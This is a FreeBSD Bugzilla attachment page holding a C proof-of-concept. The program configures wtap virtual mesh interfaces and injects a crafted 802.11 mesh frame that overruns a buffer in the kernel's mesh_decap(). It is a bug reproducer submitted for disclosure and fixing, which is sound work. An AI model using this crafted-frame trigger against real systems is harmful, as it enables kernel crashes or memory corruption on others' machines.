FreeBSD Bugzilla – Attachment 239928 Details for
Bug 269347
802.11 mesh peer can overrun b[] in mesh_decap()
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Help
|
New Account
|
Log In
Remember
[x]
|
Forgot Password
Login:
[x]
generate an 802.11 mesh packet that causes an overrun of b[] in mesh_decap()
wtap18a.c (text/plain), 1.90 KB, created by
Robert Morris
on 2023-02-05 19:59:18 UTC
(
hide
)
Description:
generate an 802.11 mesh packet that causes an overrun of b[] in mesh_decap()
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-02-05 19:59:18 UTC
Size:
1.90 KB
patch
obsolete
>#include <stdio.h> >#include <stdlib.h> >#include <unistd.h> >#include <signal.h> >#include <string.h> >#include <fcntl.h> >#include <sys/resource.h> >#include <sys/socket.h> >#include <netinet/in.h> >#include <sys/resource.h> >#include <net80211/ieee80211.h> >#include <sys/ioctl.h> >#include <net/if.h> >#include <net80211/ieee80211_ioctl.h> > >unsigned long long aa[] = { >0x47ull, >0x0ull, >0x67ffull, >0xa000000000000ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >}; >int aai; > >int >main() { > struct rlimit r; > r.rlim_cur = r.rlim_max = 0; > setrlimit(RLIMIT_CORE, &r); > > system("kldload wtap"); > > system("ifconfig wlan0 down"); > system("ifconfig wlan0 destroy"); > system("/wtap d 0"); > > system("ifconfig wlan1 down"); > system("ifconfig wlan1 destroy"); > system("/wtap d 1"); > > // /usr/src/tools/tools/wtap/wtap/wtap.c > system("/wtap c 0"); > > system("ifconfig wlan0 create wlanmode mesh wlandev wtap0 meshid x"); > > system("ifconfig wlan0 inet 1.1.1.1/24 up"); > > system("/wtap c 1"); > system("ifconfig wlan1 create wlanmode mesh wlandev wtap1 meshid x"); > system("ifconfig wlan1 inet 1.1.1.2/24 up"); > > system("/vis_map o"); > system("/vis_map a 0 1"); > system("/vis_map a 1 0"); > > sleep(5); > > int fd = open("/dev/wlan0", 1); > if(fd < 0){ > perror("/dev/wlan0"); > exit(1); > } > > char buf[256]; > memset(buf, 0xff, sizeof(buf)); > > for(int i = 0; i+8 <= sizeof(buf); i += 8) > *(long long *)(buf + i) ^= aa[aai++]; > > struct ieee80211_frame *wh = (void *) buf; > > memset(wh->i_addr1, 0xff, 6); // dst > > // src > wh->i_addr2[0] = 0x00; > wh->i_addr2[1] = 0x98; > wh->i_addr2[2] = 0x9a; > wh->i_addr2[3] = 0x98; > wh->i_addr2[4] = 0x96; > wh->i_addr2[5] = 0x98; > > if(write(fd, buf, sizeof(buf)) < 0) > perror("write"); > > usleep(200000); >}
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 269347
: 239928